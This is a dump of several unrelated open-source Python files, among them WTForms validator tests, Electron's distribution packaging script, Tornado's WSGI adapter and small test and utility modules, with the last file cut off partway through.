self.assertRaises(ValidationError, email(), self.form, DummyField('foo'))
self.assertRaises(ValidationError, email(), self.form, DummyField('bar.dk'))
self.assertRaises(ValidationError, email(), self.form, DummyField('foo@'))
self.assertRaises(ValidationError, email(), self.form, DummyField('@bar.dk'))
self.assertRaises(ValidationError, email(), self.form, DummyField('foo@bar'))
self.assertRaises(ValidationError, email(), self.form, DummyField('foo@bar.ab12'))
self.assertRaises(ValidationError, email(), self.form, DummyField('foo@.bar.ab'))
def test_equal_to(self):
self.form['foo'] = DummyField('test')
self.assertEqual(equal_to('foo')(self.form, self.form['foo']), None)
self.assertRaises(ValidationError, equal_to('invalid_field_name'), self.form, DummyField('test'))
self.assertRaises(ValidationError, equal_to('foo'), self.form, DummyField('different_value'))
def test_ip_address(self):
self.assertEqual(ip_address()(self.form, DummyField('127.0.0.1')), None)
self.assertRaises(ValidationError, ip_address(), self.form, DummyField('abc.0.0.1'))
self.assertRaises(ValidationError, ip_address(), self.form, DummyField('1278.0.0.1'))
self.assertRaises(ValidationError, ip_address(), self.form, DummyField('127.0.0.abc'))
self.assertRaises(ValidationError, ip_address(), self.form, DummyField('900.200.100.75'))
self.assertRaises(ValidationError, ip_address(ipv6=True), self.form, DummyField('abc.0.0.1'))
self.assertRaises(ValidationError, ip_address(ipv6=True), self.form, DummyField('abcd:1234::123::1'))
for good_address in ('::1', 'dead:beef:0:0:0:0:42:1', 'abcd:ef::42:1'):
self.assertEqual(ip_address(ipv6=True)(self.form, DummyField(good_address)), None)
def test_mac_address(self):
self.assertEqual(mac_address()(self.form,
DummyField('01:23:45:67:ab:CD')), None)
check_fail = partial(
self.assertRaises, ValidationError,
mac_address(), self.form
)
check_fail(DummyField('00:00:00:00:00'))
check_fail(DummyField('01:23:45:67:89:'))
check_fail(DummyField('01:23:45:67:89:gh'))
check_fail(DummyField('123:23:45:67:89:00'))
def test_uuid(self):
self.assertEqual(UUID()(self.form, DummyField(
'2bc1c94f-0deb-43e9-92a1-4775189ec9f8')), None)
self.assertRaises(ValidationError, UUID(), self.form,
DummyField('2bc1c94f-deb-43e9-92a1-4775189ec9f8'))
self.assertRaises(ValidationError, UUID(), self.form,
DummyField('2bc1c94f-0deb-43e9-92a1-4775189ec9f'))
self.assertRaises(ValidationError, UUID(), self.form,
DummyField('gbc1c94f-0deb-43e9-92a1-4775189ec9f8'))
self.assertRaises(ValidationError, UUID(), self.form,
DummyField('2bc1c94f 0deb-43e9-92a1-4775189ec9f8'))
def test_length(self):
field = DummyField('foobar')
self.assertEqual(length(min=2, max=6)(self.form, field), None)
self.assertRaises(ValidationError, length(min=7), self.form, field)
self.assertEqual(length(min=6)(self.form, field), None)
self.assertRaises(ValidationError, length(max=5), self.form, field)
self.assertEqual(length(max=6)(self.form, field), None)
self.assertRaises(AssertionError, length)
self.assertRaises(AssertionError, length, min=5, max=2)
# Test new formatting features
grab = lambda **k : grab_error_message(length(**k), self.form, field)
self.assertEqual(grab(min=2, max=5, message='%(min)d and %(max)d'), '2 and 5')
self.assertTrue('at least 8' in grab(min=8))
self.assertTrue('longer than 5' in grab(max=5))
self.assertTrue('between 2 and 5' in grab(min=2, max=5))
def test_required(self):
self.assertEqual(required()(self.form, DummyField('foobar')), None)
self.assertRaises(StopValidation, required(), self.form, DummyField(''))
self.assertRaises(StopValidation, required(), self.form, DummyField(' '))
self.assertEqual(required().field_flags, ('required', ))
f = DummyField('', ['Invalid Integer Value'])
self.assertEqual(len(f.errors), 1)
self.assertRaises(StopValidation, required(), self.form, f)
self.assertEqual(len(f.errors), 0)
def test_optional(self):
self.assertEqual(optional()(self.form, DummyField('foobar', raw_data=['foobar'])), None)
self.assertRaises(StopValidation, optional(), self.form, DummyField('', raw_data=['']))
self.assertEqual(optional().field_flags, ('optional', ))
f = DummyField('', ['Invalid Integer Value'], raw_data=[''])
self.assertEqual(len(f.errors), 1)
self.assertRaises(StopValidation, optional(), self.form, f)
self.assertEqual(len(f.errors), 0)
# Test for whitespace behavior.
whitespace_field = DummyField(' ', raw_data=[' '])
self.assertRaises(StopValidation, optional(), self.form, whitespace_field)
self.assertEqual(optional(strip_whitespace=False)(self.form, whitespace_field), None)
def test_regexp(self):
import re
# String regexp
self.assertEqual(regexp('^a')(self.form, DummyField('abcd')), None)
self.assertEqual(regexp('^a', re.I)(self.form, DummyField('ABcd')), None)
self.assertRaises(ValidationError, regexp('^a'), self.form, DummyField('foo'))
self.assertRaises(ValidationError, regexp('^a'), self.form, DummyField(None))
# Compiled regexp
self.assertEqual(regexp(re.compile('^a'))(self.form, DummyField('abcd')), None)
self.assertEqual(regexp(re.compile('^a', re.I))(self.form, DummyField('ABcd')), None)
self.assertRaises(ValidationError, regexp(re.compile('^a')), self.form, DummyField('foo'))
self.assertRaises(ValidationError, regexp(re.compile('^a')), self.form, DummyField(None))
def test_url(self):
self.assertEqual(url()(self.form, DummyField('http://foobar.dk')), None)
self.assertEqual(url()(self.form, DummyField('http://foobar.dk/')), None)
self.assertEqual(url()(self.form, DummyField('http://foobar.museum/foobar')), None)
self.assertEqual(url()(self.form, DummyField('http://127.0.0.1/foobar')), None)
self.assertEqual(url()(self.form, DummyField('http://127.0.0.1:9000/fake')), None)
self.assertEqual(url(require_tld=False)(self.form, DummyField('http://localhost/foobar')), None)
self.assertEqual(url(require_tld=False)(self.form, DummyField('http://foobar')), None)
self.assertRaises(ValidationError, url(), self.form, DummyField('http://foobar'))
self.assertRaises(ValidationError, url(), self.form, DummyField('foobar.dk'))
self.assertRaises(ValidationError, url(), self.form, DummyField('http://127.0.0/asdf'))
self.assertRaises(ValidationError, url(), self.form, DummyField('http://foobar.d'))
self.assertRaises(ValidationError, url(), self.form, DummyField('http://foobar.12'))
self.assertRaises(ValidationError, url(), self.form, DummyField('http://localhost:abc/a'))
def test_number_range(self):
v = NumberRange(min=5, max=10)
self.assertEqual(v(self.form, DummyField(7)), None)
self.assertRaises(ValidationError, v, self.form, DummyField(None))
self.assertRaises(ValidationError, v, self.form, DummyField(0))
self.assertRaises(ValidationError, v, self.form, DummyField(12))
self.assertRaises(ValidationError, v, self.form, DummyField(-5))
onlymin = NumberRange(min=5)
self.assertEqual(onlymin(self.form, DummyField(500)), None)
self.assertRaises(ValidationError, onlymin, self.form, DummyField(4))
onlymax = NumberRange(max=50)
self.assertEqual(onlymax(self.form, DummyField(30)), None)
self.assertRaises(ValidationError, onlymax, self.form, DummyField(75))
def test_lazy_proxy(self):
"""Tests that the validators support lazy translation strings for messages."""
class ReallyLazyProxy(object):
def __unicode__(self):
raise Exception('Translator function called during form declaration: it should be called at response time.')
__str__ = __unicode__
message = ReallyLazyProxy()
self.assertRaises(Exception, str, message)
self.assertRaises(Exception, text_type, message)
self.assertTrue(equal_to('fieldname', message=message))
self.assertTrue(length(min=1, message=message))
self.assertTrue(NumberRange(1,5, message=message))
self.assertTrue(required(message=message))
self.assertTrue(regexp('.+', message=message))
self.assertTrue(email(message=message))
self.assertTrue(ip_address(message=message))
self.assertTrue(url(message=message))
def test_any_of(self):
self.assertEqual(AnyOf(['a', 'b', 'c'])(self.form, DummyField('b')), None)
self.assertRaises(ValueError, AnyOf(['a', 'b', 'c']), self.form, DummyField(None))
# Anyof in 1.0.1 failed on numbers for formatting the error with a TypeError
check_num = AnyOf([1,2,3])
self.assertEqual(check_num(self.form, DummyField(2)), None)
self.assertRaises(ValueError, check_num, self.form, DummyField(4))
# Test values_formatter
formatter = lambda values: '::'.join(text_type(x) for x in reversed(values))
checker = AnyOf([7,8,9], message='test %(values)s', values_formatter=formatter)
self.assertEqual(grab_error_message(checker, self.form, DummyField(4)), 'test 9::8::7')
def test_none_of(self):
self.assertEqual(NoneOf(['a', 'b', 'c'])(self.form, DummyField('d')), None)
self.assertRaises(ValueError, NoneOf(['a', 'b', 'c']), self.form, DummyField('a'))
if __name__ == '__main__':
from unittest import main
main()
|
pandoraui/electron | refs/heads/master | script/create-dist.py | 34 | #!/usr/bin/env python
import os
import re
import shutil
import subprocess
import sys
import stat
from lib.config import LIBCHROMIUMCONTENT_COMMIT, BASE_URL, PLATFORM, \
get_target_arch, get_chromedriver_version
from lib.util import scoped_cwd, rm_rf, get_atom_shell_version, make_zip, \
execute, atom_gyp
ATOM_SHELL_VERSION = get_atom_shell_version()
SOURCE_ROOT = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
DIST_DIR = os.path.join(SOURCE_ROOT, 'dist')
OUT_DIR = os.path.join(SOURCE_ROOT, 'out', 'R')
CHROMIUM_DIR = os.path.join(SOURCE_ROOT, 'vendor', 'brightray', 'vendor',
'download', 'libchromiumcontent', 'static_library')
PROJECT_NAME = atom_gyp()['project_name%']
PRODUCT_NAME = atom_gyp()['product_name%']
TARGET_BINARIES = {
'darwin': [
],
'win32': [
'{0}.exe'.format(PROJECT_NAME), # 'electron.exe'
'content_shell.pak',
'd3dcompiler_47.dll',
'ffmpegsumo.dll',
'icudtl.dat',
'libEGL.dll',
'libGLESv2.dll',
'msvcp120.dll',
'msvcr120.dll',
'node.dll',
'pdf.dll',
'content_resources_200_percent.pak',
'ui_resources_200_percent.pak',
'xinput1_3.dll',
'natives_blob.bin',
'snapshot_blob.bin',
'vccorlib120.dll',
],
'linux': [
PROJECT_NAME, # 'electron'
'content_shell.pak',
'icudtl.dat',
'libffmpegsumo.so',
'libnode.so',
'natives_blob.bin',
'snapshot_blob.bin',
],
}
TARGET_DIRECTORIES = {
'darwin': [
'{0}.app'.format(PRODUCT_NAME),
],
'win32': [
'resources',
'locales',
],
'linux': [
'resources',
'locales',
],
}
SYSTEM_LIBRARIES = [
'libgcrypt.so',
'libnotify.so',
]
def main():
rm_rf(DIST_DIR)
os.makedirs(DIST_DIR)
target_arch = get_target_arch()
force_build()
create_symbols()
copy_binaries()
copy_chrome_binary('chromedriver')
copy_chrome_binary('mksnapshot')
copy_license()
if PLATFORM == 'linux':
strip_binaries()
if target_arch != 'arm':
copy_system_libraries()
create_version()
create_dist_zip()
create_chrome_binary_zip('chromedriver', get_chromedriver_version())
create_chrome_binary_zip('mksnapshot', ATOM_SHELL_VERSION)
create_symbols_zip()
def force_build():
build = os.path.join(SOURCE_ROOT, 'script', 'build.py')
execute([sys.executable, build, '-c', 'Release'])
def copy_binaries():
for binary in TARGET_BINARIES[PLATFORM]:
shutil.copy2(os.path.join(OUT_DIR, binary), DIST_DIR)
for directory in TARGET_DIRECTORIES[PLATFORM]:
shutil.copytree(os.path.join(OUT_DIR, directory),
os.path.join(DIST_DIR, directory),
symlinks=True)
def copy_chrome_binary(binary):
if PLATFORM == 'win32':
binary += '.exe'
src = os.path.join(CHROMIUM_DIR, binary)
dest = os.path.join(DIST_DIR, binary)
# Copy file and keep the executable bit.
shutil.copyfile(src, dest)
os.chmod(dest, os.stat(dest).st_mode | stat.S_IEXEC)
def copy_license():
shutil.copy2(os.path.join(SOURCE_ROOT, 'LICENSE'), DIST_DIR)
def strip_binaries():
if get_target_arch() == 'arm':
strip = 'arm-linux-gnueabihf-strip'
else:
strip = 'strip'
for binary in TARGET_BINARIES[PLATFORM]:
if binary.endswith('.so') or '.' not in binary:
execute([strip, os.path.join(DIST_DIR, binary)])
def copy_system_libraries():
executable_path = os.path.join(OUT_DIR, PROJECT_NAME) # our/R/electron
ldd = execute(['ldd', executable_path])
lib_re = re.compile('\t(.*) => (.+) \(.*\)$')
for line in ldd.splitlines():
m = lib_re.match(line)
if not m:
continue
for i, library in enumerate(SYSTEM_LIBRARIES):
real_library = m.group(1)
if real_library.startswith(library):
shutil.copyfile(m.group(2), os.path.join(DIST_DIR, real_library))
SYSTEM_LIBRARIES[i] = real_library
def create_version():
version_path = os.path.join(SOURCE_ROOT, 'dist', 'version')
with open(version_path, 'w') as version_file:
version_file.write(ATOM_SHELL_VERSION)
def create_symbols():
destination = os.path.join(DIST_DIR, '{0}.breakpad.syms'.format(PROJECT_NAME))
dump_symbols = os.path.join(SOURCE_ROOT, 'script', 'dump-symbols.py')
execute([sys.executable, dump_symbols, destination])
def create_dist_zip():
dist_name = '{0}-{1}-{2}-{3}.zip'.format(PROJECT_NAME, ATOM_SHELL_VERSION,
PLATFORM, get_target_arch())
zip_file = os.path.join(SOURCE_ROOT, 'dist', dist_name)
with scoped_cwd(DIST_DIR):
files = TARGET_BINARIES[PLATFORM] + ['LICENSE', 'version']
if PLATFORM == 'linux':
files += [lib for lib in SYSTEM_LIBRARIES if os.path.exists(lib)]
dirs = TARGET_DIRECTORIES[PLATFORM]
make_zip(zip_file, files, dirs)
def create_chrome_binary_zip(binary, version):
dist_name = '{0}-{1}-{2}-{3}.zip'.format(binary, version, PLATFORM,
get_target_arch())
zip_file = os.path.join(SOURCE_ROOT, 'dist', dist_name)
with scoped_cwd(DIST_DIR):
files = ['LICENSE']
if PLATFORM == 'win32':
files += [binary + '.exe']
else:
files += [binary]
make_zip(zip_file, files, [])
def create_symbols_zip():
dist_name = '{0}-{1}-{2}-{3}-symbols.zip'.format(PROJECT_NAME,
ATOM_SHELL_VERSION,
PLATFORM,
get_target_arch())
zip_file = os.path.join(SOURCE_ROOT, 'dist', dist_name)
with scoped_cwd(DIST_DIR):
files = ['LICENSE', 'version']
dirs = ['{0}.breakpad.syms'.format(PROJECT_NAME)]
make_zip(zip_file, files, dirs)
if __name__ == '__main__':
sys.exit(main())
|
decvalts/landlab | refs/heads/master | landlab/grid/tests/test_raster_funcs/test_gradients_at_active_links.py | 1 | import numpy as np
from numpy.testing import assert_array_equal
from nose import with_setup
try:
from nose.tools import assert_is
except ImportError:
from landlab.testing.tools import assert_is
from landlab import RasterModelGrid
_GRIDS = {}
def setup_grids():
_GRIDS.update({
'unit': RasterModelGrid(4, 5),
'non_unit': RasterModelGrid(4, 5, 2.),
})
@with_setup(setup_grids)
def test_unit_spacing():
rmg, values_at_nodes = _GRIDS['unit'], np.arange(20)
grads = rmg.calculate_gradients_at_active_links(values_at_nodes)
assert_array_equal(grads, np.array([5, 5, 5, 5, 5, 5, 5, 5, 5,
1, 1, 1, 1, 1, 1, 1, 1]))
diffs = rmg.calculate_diff_at_active_links(values_at_nodes)
assert_array_equal(grads, diffs)
@with_setup(setup_grids)
def test_non_unit_spacing():
rmg, values_at_nodes = _GRIDS['non_unit'], np.arange(20)
grads = rmg.calculate_gradients_at_active_links(values_at_nodes)
assert_array_equal(grads, (1. / rmg.node_spacing) *
np.array([5, 5, 5, 5, 5, 5, 5, 5, 5,
1, 1, 1, 1, 1, 1, 1, 1]))
diffs = rmg.calculate_diff_at_active_links(values_at_nodes)
assert_array_equal(grads, (1. / rmg.node_spacing) * diffs)
@with_setup(setup_grids)
def test_out_array():
rmg, values_at_nodes = _GRIDS['non_unit'], np.arange(20)
output_array = np.empty(17)
rtn_array = rmg.calculate_gradients_at_active_links(values_at_nodes,
out=output_array)
assert_array_equal(rtn_array, np.array([5, 5, 5, 5, 5, 5, 5, 5, 5,
1, 1, 1, 1, 1, 1, 1, 1]) / rmg.node_spacing)
assert_is(rtn_array, output_array)
@with_setup(setup_grids)
def test_diff_out_array():
rmg = RasterModelGrid(4, 5)
values = np.arange(20)
diff = np.empty(17)
rtn_diff = rmg.calculate_diff_at_active_links(values, out=diff)
assert_array_equal(
diff,
np.array([5, 5, 5, 5, 5, 5, 5, 5, 5,
1, 1, 1, 1, 1, 1, 1, 1]))
assert_is(rtn_diff, diff)
|
saurabh6790/test-erp | refs/heads/develop | erpnext/selling/doctype/product_bundle/__init__.py | 12133432 | |
Fantomas42/django-blog-zinnia | refs/heads/develop | zinnia/migrations/0002_lead_paragraph_and_image_caption.py | 3 | from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
dependencies = [
('zinnia', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='entry',
name='image_caption',
field=models.TextField(
help_text="Image's caption.",
verbose_name='caption', blank=True),
preserve_default=False,
),
migrations.AddField(
model_name='entry',
name='lead',
field=models.TextField(
help_text='Lead paragraph',
verbose_name='lead', blank=True),
preserve_default=False,
),
]
|
steven004/TestSteps | refs/heads/master | test_examples/test_lesson1_autolog.py | 1 | __author__ = 'Steven LI'
from test_steps import *
import logging, time
def my_add(*args):
ret = 0
for i in args:
ret += i
return ret
def my_mul(*args):
ret = 1
for i in args:
ret *= i
return ret
def test_logger_setup():
''' Add file-logging into test_logger
This is changed from 0.6.1 version.
In previous version, this is added by default, but loss of flexibility.
So, leave for user from 0.6.1
'''
file_name = time.strftime('/tmp/test'+"_%Y%m%d_%H%M.log")
fh = logging.FileHandler(file_name)
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
test_logger.addHandler(fh)
def test_basic():
test_logger.info("To show the basic auto-log functions")
## eq(expr1, expr2, passdesc='', faildesc='')
eq(my_add(3,4,5), my_mul(3,4), "3+4+5 == 3*4")
ne(my_add(3,4,6), 12)
gt(my_add(3,4,5), 10)
ge(my_mul(3,4), 11)
lt(my_add(5,6,7), my_add(3,4,5,7))
le(my_add(5,6,7), my_add(3,4,5,6))
match("Shanghai City", "City") #regex can be used for the 2nd parameter
unmatch("I ate an apple", r'banana|orange')
## ok(boolean_expr, passdesc='', faildesc='')
ok(3>5, "3<5, logged when pass... ", "3<5, logged when fail")
fail("Just fail and log. nothing more")
## The following logging information will be auto-logged in log file when running the test_basic
## The log file is '/tmp/test_yyyymmdd_hhmm.log'
##
'''
2015-01-15 20:09:13,731 - INFO - To show the basic auto-log functions
2015-01-15 20:09:13,746 - INFO - ------------------------------------------------------
2015-01-15 20:09:13,746 - INFO - Func test_basic in file: /TestSteps/test_examples/test_lesson1_autolog.py
2015-01-15 20:09:13,746 - INFO - Check-1: 3+4+5 == 3*4 - PASS - 12 == 12?
2015-01-15 20:09:13,746 - INFO - Check-2: 13 != 12 - PASS - 13 != 12?
2015-01-15 20:09:13,746 - INFO - Check-3: 12 > 10 - PASS - 12 > 10?
2015-01-15 20:09:13,746 - INFO - Check-4: 12 >= 11 - PASS - 12 >= 11?
2015-01-15 20:09:13,746 - INFO - Check-5: 18 < 19 - PASS - 18 < 19?
2015-01-15 20:09:13,747 - INFO - Check-6: 18 <= 18 - PASS - 18 <= 18?
2015-01-15 20:09:13,747 - INFO - Check-7: 'Shanghai City' =~ 'City' - PASS - 'Shanghai City' =~ 'City'?
2015-01-15 20:09:13,747 - INFO - Check-8: 'I ate an apple' !~ 'banana|orange' - PASS - 'I ate an apple' !~ 'banana|orange'?
2015-01-15 20:09:13,747 - ERROR - Check-9: 3<5, logged when fail - FAIL -
'''
########################################################################################
# Program stop on a failed step. (if you want it continue, take more lessons)
# Take lesson 2 to get more powerful functions
########################################################################################
if __name__ == '__main__':
test_logger_setup()
test_basic() |
acarmel/CouchPotatoServer | refs/heads/master | libs/tornado/wsgi.py | 73 | #!/usr/bin/env python
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""WSGI support for the Tornado web framework.
WSGI is the Python standard for web servers, and allows for interoperability
between Tornado and other Python web frameworks and servers. This module
provides WSGI support in two ways:
* `WSGIAdapter` converts a `tornado.web.Application` to the WSGI application
interface. This is useful for running a Tornado app on another
HTTP server, such as Google App Engine. See the `WSGIAdapter` class
documentation for limitations that apply.
* `WSGIContainer` lets you run other WSGI applications and frameworks on the
Tornado HTTP server. For example, with this class you can mix Django
and Tornado handlers in a single server.
"""
from __future__ import absolute_import, division, print_function, with_statement
import sys
from io import BytesIO
import tornado
from tornado.concurrent import Future
from tornado import escape
from tornado import httputil
from tornado.log import access_log
from tornado import web
from tornado.escape import native_str
from tornado.util import unicode_type
try:
import urllib.parse as urllib_parse # py3
except ImportError:
import urllib as urllib_parse
# PEP 3333 specifies that WSGI on python 3 generally deals with byte strings
# that are smuggled inside objects of type unicode (via the latin1 encoding).
# These functions are like those in the tornado.escape module, but defined
# here to minimize the temptation to use them in non-wsgi contexts.
if str is unicode_type:
def to_wsgi_str(s):
assert isinstance(s, bytes)
return s.decode('latin1')
def from_wsgi_str(s):
assert isinstance(s, str)
return s.encode('latin1')
else:
def to_wsgi_str(s):
assert isinstance(s, bytes)
return s
def from_wsgi_str(s):
assert isinstance(s, str)
return s
class WSGIApplication(web.Application):
"""A WSGI equivalent of `tornado.web.Application`.
.. deprecated:: 4.0
Use a regular `.Application` and wrap it in `WSGIAdapter` instead.
"""
def __call__(self, environ, start_response):
return WSGIAdapter(self)(environ, start_response)
# WSGI has no facilities for flow control, so just return an already-done
# Future when the interface requires it.
_dummy_future = Future()
_dummy_future.set_result(None)
class _WSGIConnection(httputil.HTTPConnection):
def __init__(self, method, start_response, context):
self.method = method
self.start_response = start_response
self.context = context
self._write_buffer = []
self._finished = False
self._expected_content_remaining = None
self._error = None
def set_close_callback(self, callback):
# WSGI has no facility for detecting a closed connection mid-request,
# so we can simply ignore the callback.
pass
def write_headers(self, start_line, headers, chunk=None, callback=None):
if self.method == 'HEAD':
self._expected_content_remaining = 0
elif 'Content-Length' in headers:
self._expected_content_remaining = int(headers['Content-Length'])
else:
self._expected_content_remaining = None
self.start_response(
'%s %s' % (start_line.code, start_line.reason),
[(native_str(k), native_str(v)) for (k, v) in headers.get_all()])
if chunk is not None:
self.write(chunk, callback)
elif callback is not None:
callback()
return _dummy_future
def write(self, chunk, callback=None):
if self._expected_content_remaining is not None:
self._expected_content_remaining -= len(chunk)
if self._expected_content_remaining < 0:
self._error = httputil.HTTPOutputError(
"Tried to write more data than Content-Length")
raise self._error
self._write_buffer.append(chunk)
if callback is not None:
callback()
return _dummy_future
def finish(self):
if (self._expected_content_remaining is not None and
self._expected_content_remaining != 0):
self._error = httputil.HTTPOutputError(
"Tried to write %d bytes less than Content-Length" %
self._expected_content_remaining)
raise self._error
self._finished = True
class _WSGIRequestContext(object):
def __init__(self, remote_ip, protocol):
self.remote_ip = remote_ip
self.protocol = protocol
def __str__(self):
return self.remote_ip
class WSGIAdapter(object):
"""Converts a `tornado.web.Application` instance into a WSGI application.
Example usage::
import tornado.web
import tornado.wsgi
import wsgiref.simple_server
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.write("Hello, world")
if __name__ == "__main__":
application = tornado.web.Application([
(r"/", MainHandler),
])
wsgi_app = tornado.wsgi.WSGIAdapter(application)
server = wsgiref.simple_server.make_server('', 8888, wsgi_app)
server.serve_forever()
See the `appengine demo
<https://github.com/tornadoweb/tornado/tree/stable/demos/appengine>`_
for an example of using this module to run a Tornado app on Google
App Engine.
In WSGI mode asynchronous methods are not supported. This means
that it is not possible to use `.AsyncHTTPClient`, or the
`tornado.auth` or `tornado.websocket` modules.
.. versionadded:: 4.0
"""
def __init__(self, application):
if isinstance(application, WSGIApplication):
self.application = lambda request: web.Application.__call__(
application, request)
else:
self.application = application
def __call__(self, environ, start_response):
method = environ["REQUEST_METHOD"]
uri = urllib_parse.quote(from_wsgi_str(environ.get("SCRIPT_NAME", "")))
uri += urllib_parse.quote(from_wsgi_str(environ.get("PATH_INFO", "")))
if environ.get("QUERY_STRING"):
uri += "?" + environ["QUERY_STRING"]
headers = httputil.HTTPHeaders()
if environ.get("CONTENT_TYPE"):
headers["Content-Type"] = environ["CONTENT_TYPE"]
if environ.get("CONTENT_LENGTH"):
headers["Content-Length"] = environ["CONTENT_LENGTH"]
for key in environ:
if key.startswith("HTTP_"):
headers[key[5:].replace("_", "-")] = environ[key]
if headers.get("Content-Length"):
body = environ["wsgi.input"].read(
int(headers["Content-Length"]))
else:
body = b""
protocol = environ["wsgi.url_scheme"]
remote_ip = environ.get("REMOTE_ADDR", "")
if environ.get("HTTP_HOST"):
host = environ["HTTP_HOST"]
else:
host = environ["SERVER_NAME"]
connection = _WSGIConnection(method, start_response,
_WSGIRequestContext(remote_ip, protocol))
request = httputil.HTTPServerRequest(
method, uri, "HTTP/1.1", headers=headers, body=body,
host=host, connection=connection)
request._parse_body()
self.application(request)
if connection._error:
raise connection._error
if not connection._finished:
raise Exception("request did not finish synchronously")
return connection._write_buffer
class WSGIContainer(object):
r"""Makes a WSGI-compatible function runnable on Tornado's HTTP server.
.. warning::
WSGI is a *synchronous* interface, while Tornado's concurrency model
is based on single-threaded asynchronous execution. This means that
running a WSGI app with Tornado's `WSGIContainer` is *less scalable*
than running the same app in a multi-threaded WSGI server like
``gunicorn`` or ``uwsgi``. Use `WSGIContainer` only when there are
benefits to combining Tornado and WSGI in the same process that
outweigh the reduced scalability.
Wrap a WSGI function in a `WSGIContainer` and pass it to `.HTTPServer` to
run it. For example::
def simple_app(environ, start_response):
status = "200 OK"
response_headers = [("Content-type", "text/plain")]
start_response(status, response_headers)
return ["Hello world!\n"]
container = tornado.wsgi.WSGIContainer(simple_app)
http_server = tornado.httpserver.HTTPServer(container)
http_server.listen(8888)
tornado.ioloop.IOLoop.instance().start()
This class is intended to let other frameworks (Django, web.py, etc)
run on the Tornado HTTP server and I/O loop.
The `tornado.web.FallbackHandler` class is often useful for mixing
Tornado and WSGI apps in the same server. See
https://github.com/bdarnell/django-tornado-demo for a complete example.
"""
def __init__(self, wsgi_application):
self.wsgi_application = wsgi_application
def __call__(self, request):
data = {}
response = []
def start_response(status, response_headers, exc_info=None):
data["status"] = status
data["headers"] = response_headers
return response.append
app_response = self.wsgi_application(
WSGIContainer.environ(request), start_response)
try:
response.extend(app_response)
body = b"".join(response)
finally:
if hasattr(app_response, "close"):
app_response.close()
if not data:
raise Exception("WSGI app did not call start_response")
status_code = int(data["status"].split()[0])
headers = data["headers"]
header_set = set(k.lower() for (k, v) in headers)
body = escape.utf8(body)
if status_code != 304:
if "content-length" not in header_set:
headers.append(("Content-Length", str(len(body))))
if "content-type" not in header_set:
headers.append(("Content-Type", "text/html; charset=UTF-8"))
if "server" not in header_set:
headers.append(("Server", "TornadoServer/%s" % tornado.version))
parts = [escape.utf8("HTTP/1.1 " + data["status"] + "\r\n")]
for key, value in headers:
parts.append(escape.utf8(key) + b": " + escape.utf8(value) + b"\r\n")
parts.append(b"\r\n")
parts.append(body)
request.write(b"".join(parts))
request.finish()
self._log(status_code, request)
@staticmethod
def environ(request):
"""Converts a `tornado.httputil.HTTPServerRequest` to a WSGI environment.
"""
hostport = request.host.split(":")
if len(hostport) == 2:
host = hostport[0]
port = int(hostport[1])
else:
host = request.host
port = 443 if request.protocol == "https" else 80
environ = {
"REQUEST_METHOD": request.method,
"SCRIPT_NAME": "",
"PATH_INFO": to_wsgi_str(escape.url_unescape(
request.path, encoding=None, plus=False)),
"QUERY_STRING": request.query,
"REMOTE_ADDR": request.remote_ip,
"SERVER_NAME": host,
"SERVER_PORT": str(port),
"SERVER_PROTOCOL": request.version,
"wsgi.version": (1, 0),
"wsgi.url_scheme": request.protocol,
"wsgi.input": BytesIO(escape.utf8(request.body)),
"wsgi.errors": sys.stderr,
"wsgi.multithread": False,
"wsgi.multiprocess": True,
"wsgi.run_once": False,
}
if "Content-Type" in request.headers:
environ["CONTENT_TYPE"] = request.headers.pop("Content-Type")
if "Content-Length" in request.headers:
environ["CONTENT_LENGTH"] = request.headers.pop("Content-Length")
for key, value in request.headers.items():
environ["HTTP_" + key.replace("-", "_").upper()] = value
return environ
def _log(self, status_code, request):
if status_code < 400:
log_method = access_log.info
elif status_code < 500:
log_method = access_log.warning
else:
log_method = access_log.error
request_time = 1000.0 * request.request_time()
summary = request.method + " " + request.uri + " (" + \
request.remote_ip + ")"
log_method("%d %s %.2fms", status_code, summary, request_time)
HTTPRequest = httputil.HTTPServerRequest
|
kidmaple/CoolWall | refs/heads/nios2 | user/python/Tools/compiler/dumppyc.py | 3 | #! /usr/bin/env python
import marshal
import dis
import types
def dump(obj):
print obj
for attr in dir(obj):
print "\t", attr, repr(getattr(obj, attr))
def loadCode(path):
f = open(path)
f.read(8)
co = marshal.load(f)
f.close()
return co
def walk(co, match=None):
if match is None or co.co_name == match:
dump(co)
print
dis.dis(co)
for obj in co.co_consts:
if type(obj) == types.CodeType:
walk(obj, match)
def main(filename, codename=None):
co = loadCode(filename)
walk(co, codename)
if __name__ == "__main__":
import sys
if len(sys.argv) == 3:
filename, codename = sys.argv[1:]
else:
filename = sys.argv[1]
codename = None
main(filename, codename)
|
msebire/intellij-community | refs/heads/master | python/testData/completion/py3595/moduleX.py | 83 | import smname
import smname.moduleY
smname.moduleY.mod<caret>
|
ramondeklein/energymeter | refs/heads/master | log.py | 1 | from config import configuration
import logging
import os
def initialize_logging(section):
# Default is no log warnings
log_warnings = []
# Determine the logfile
log_file = configuration.get(section, 'logfile') if configuration.has_option(section, 'logfile') else None
# Determine the log level
log_level_text = configuration.get(section, 'loglevel') if configuration.has_option(section, 'loglevel') else 'INFO'
log_level_text = log_level_text.lower()
if log_level_text == 'debug':
log_level = logging.DEBUG
elif log_level_text == 'info':
log_level = logging.INFO
elif log_level_text == 'warn':
log_level = logging.WARN
elif log_level_text == 'error':
log_level = logging.ERROR
else:
log_warnings.append('[{}] has invalid loglevel "{}" (reverting to INFO level).'.format(section, log_level_text))
log_level_text = 'info'
log_level = logging.INFO
# Check if a logfile is specified
if log_file:
# Make sure the directory exists
log_file = os.path.abspath(log_file)
log_directory = os.path.dirname(log_file)
if not os.path.exists(log_directory):
os.makedirs(log_directory)
# Configure the logging
logging.basicConfig(format='%(asctime)s:%(thread)d:%(levelname)s:%(message)s', filename=log_file, level=log_level)
else:
# Configure the logging
logging.basicConfig(format='%(asctime)s:%(thread)d:%(levelname)s:%(message)s', level=log_level)
# Obtain the logger
